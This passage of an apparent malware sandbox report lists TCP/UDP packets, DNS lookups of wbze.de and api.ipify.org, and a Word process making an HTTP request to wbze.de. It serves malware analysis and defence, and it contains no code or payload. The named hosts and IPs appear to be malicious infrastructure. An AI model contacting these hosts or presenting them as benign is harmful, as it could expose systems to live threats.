May 6, 2024 14:59:20.678637981 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678649902 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678657055 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678672075 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678690910 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678692102 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678706884 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678719997 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678730965 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678733110 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678745985 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678747892 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678759098 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678766966 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678772926 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678781986 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678790092 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678803921 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678807974 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678821087 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678832054 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678845882 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678853035 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678859949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678859949 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678879023 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678895950 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678919077 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678934097 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678946972 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678953886 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678960085 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678961039 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678968906 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678978920 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678982973 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678992033 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678996086 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679004908 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679009914 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679017067 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679017067 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679028988 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679039001 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679044008 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679044962 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679059029 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679065943 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679073095 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679080963 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679105043 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.679117918 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679131985 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.679160118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.681363106 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826370955 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826400042 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826423883 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826445103 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826457024 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826468945 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826482058 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826494932 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826508999 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826522112 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826535940 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826549053 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826565027 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826580048 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826596022 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826608896 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826615095 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826622009 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826636076 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826649904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826649904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826649904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826649904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826649904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826649904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826652050 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826663017 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826663017 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826667070 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826674938 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826678991 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826690912 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826692104 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826706886 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826714993 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826714993 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826721907 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826728106 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826736927 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826746941 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826750040 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826759100 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826762915 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826771975 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826776981 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826786041 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826788902 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826797009 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826803923 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826809883 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826817036 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826823950 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826834917 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826839924 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826848984 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826853037 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826862097 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826869965 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826874971 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826883078 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826888084 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826900005 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826900959 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826913118 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826917887 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826924086 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826932907 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826941013 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826945066 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826955080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826957941 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826961994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826973915 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826981068 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.826988935 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.826988935 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827001095 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827008009 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827017069 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827023029 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827034950 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827039003 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827049971 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827064991 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827073097 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827073097 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827078104 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827085972 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827099085 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827100992 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827110052 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827114105 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827130079 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827135086 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827143908 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827152014 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827157021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827164888 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827168941 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827178955 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827182055 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827194929 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827197075 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827208042 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827209949 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827223063 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827229977 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827238083 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827239037 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827254057 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827260017 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827269077 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827275991 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827282906 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827291012 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827303886 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827303886 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827315092 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827317953 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.827333927 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.827347994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.829598904 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:21.833046913 CEST	80	49168	109.71.253.25	192.168.2.22
May 6, 2024 14:59:21.833100080 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 14:59:22.919693947 CEST	80	49170	104.168.33.34	192.168.2.22
May 6, 2024 14:59:22.919776917 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:23.326946974 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:29.044585943 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.044629097 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.044694901 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.049902916 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.049918890 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.281883001 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.281996965 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.335850954 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.335881948 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.336263895 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.454785109 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.496128082 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.635756969 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.635824919 CEST	443	49173	104.26.13.205	192.168.2.22
May 6, 2024 14:59:29.635885954 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:29.660428047 CEST	49173	443	192.168.2.22	104.26.13.205
May 6, 2024 14:59:41.248682976 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.248729944 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.248815060 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.251981974 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.251996994 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.482078075 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.482193947 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.491679907 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.491692066 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.492242098 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.626360893 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.672115088 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.809967995 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.810039043 CEST	443	49174	172.67.74.152	192.168.2.22
May 6, 2024 14:59:41.810167074 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 14:59:41.826927900 CEST	49174	443	192.168.2.22	172.67.74.152
May 6, 2024 15:01:02.112514019 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:02.112591028 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 15:01:02.596457005 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 15:01:02.656475067 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:03.356487989 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:03.576503992 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 15:01:04.756583929 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:05.536657095 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 15:01:07.556755066 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:09.456835985 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 15:01:13.157069921 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:17.297302008 CEST	49168	80	192.168.2.22	109.71.253.25
May 6, 2024 15:01:24.367724895 CEST	49170	80	192.168.2.22	104.168.33.34
May 6, 2024 15:01:32.980218887 CEST	49168	80	192.168.2.22	109.71.253.25

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2024 14:59:02.018354893 CEST	138	138	192.168.2.22	192.168.2.255
May 6, 2024 14:59:03.905026913 CEST	54562	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:04.162538052 CEST	53	54562	8.8.8.8	192.168.2.22
May 6, 2024 14:59:04.991640091 CEST	52917	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:05.244090080 CEST	53	52917	8.8.8.8	192.168.2.22
May 6, 2024 14:59:05.248773098 CEST	62751	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:05.370099068 CEST	53	62751	8.8.8.8	192.168.2.22
May 6, 2024 14:59:10.131675005 CEST	57893	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:10.376619101 CEST	53	57893	8.8.8.8	192.168.2.22
May 6, 2024 14:59:10.401655912 CEST	54821	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:10.523901939 CEST	53	54821	8.8.8.8	192.168.2.22
May 6, 2024 14:59:12.243469000 CEST	54719	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:12.378055096 CEST	53	54719	8.8.8.8	192.168.2.22
May 6, 2024 14:59:12.379580975 CEST	49881	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:12.501507998 CEST	53	49881	8.8.8.8	192.168.2.22
May 6, 2024 14:59:28.754096031 CEST	54998	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:28.899468899 CEST	53	54998	8.8.8.8	192.168.2.22
May 6, 2024 14:59:28.899776936 CEST	54998	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:29.036623001 CEST	53	54998	8.8.8.8	192.168.2.22
May 6, 2024 14:59:30.344197035 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 14:59:31.095282078 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 14:59:31.859740019 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 14:59:41.088793993 CEST	52781	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:41.238677025 CEST	53	52781	8.8.8.8	192.168.2.22
May 6, 2024 14:59:58.782798052 CEST	63926	53	192.168.2.22	8.8.8.8
May 6, 2024 14:59:58.926302910 CEST	53	63926	8.8.8.8	192.168.2.22
May 6, 2024 14:59:59.744451046 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:00.493834972 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:01.243910074 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:08.689721107 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:09.439368963 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:10.189399004 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:12.425851107 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:13.175597906 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:00:13.925676107 CEST	137	137	192.168.2.22	192.168.2.255
May 6, 2024 15:01:01.705715895 CEST	138	138	192.168.2.22	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 6, 2024 14:59:03.905026913 CEST	192.168.2.22	8.8.8.8	0x691c	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:04.991640091 CEST	192.168.2.22	8.8.8.8	0xef9d	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:05.248773098 CEST	192.168.2.22	8.8.8.8	0x78bf	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:10.131675005 CEST	192.168.2.22	8.8.8.8	0xc083	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:10.401655912 CEST	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:12.243469000 CEST	192.168.2.22	8.8.8.8	0xb6ec	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:12.379580975 CEST	192.168.2.22	8.8.8.8	0xd97e	Standard query (0)	wbze.de	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:28.754096031 CEST	192.168.2.22	8.8.8.8	0x37ba	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:28.899776936 CEST	192.168.2.22	8.8.8.8	0x37ba	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:41.088793993 CEST	192.168.2.22	8.8.8.8	0x375c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:58.782798052 CEST	192.168.2.22	8.8.8.8	0xf5cb	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 6, 2024 14:59:04.162538052 CEST	8.8.8.8	192.168.2.22	0x691c	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:05.244090080 CEST	8.8.8.8	192.168.2.22	0xef9d	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:05.370099068 CEST	8.8.8.8	192.168.2.22	0x78bf	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:10.376619101 CEST	8.8.8.8	192.168.2.22	0xc083	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:10.523901939 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:12.378055096 CEST	8.8.8.8	192.168.2.22	0xb6ec	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:12.501507998 CEST	8.8.8.8	192.168.2.22	0xd97e	No error (0)	wbze.de	109.71.253.25	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:28.899468899 CEST	8.8.8.8	192.168.2.22	0x37ba	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:28.899468899 CEST	8.8.8.8	192.168.2.22	0x37ba	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:28.899468899 CEST	8.8.8.8	192.168.2.22	0x37ba	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:29.036623001 CEST	8.8.8.8	192.168.2.22	0x37ba	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:29.036623001 CEST	8.8.8.8	192.168.2.22	0x37ba	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:29.036623001 CEST	8.8.8.8	192.168.2.22	0x37ba	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:41.238677025 CEST	8.8.8.8	192.168.2.22	0x375c	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:41.238677025 CEST	8.8.8.8	192.168.2.22	0x375c	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:41.238677025 CEST	8.8.8.8	192.168.2.22	0x375c	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:58.926302910 CEST	8.8.8.8	192.168.2.22	0xf5cb	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:58.926302910 CEST	8.8.8.8	192.168.2.22	0xf5cb	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
May 6, 2024 14:59:58.926302910 CEST	8.8.8.8	192.168.2.22	0xf5cb	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wbze.de

api.ipify.org

104.168.33.34

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	109.71.253.25	80	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 14:59:04.385014057 CEST	129	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: wbze.de Content-Length: 0 Connection: Keep-Alive
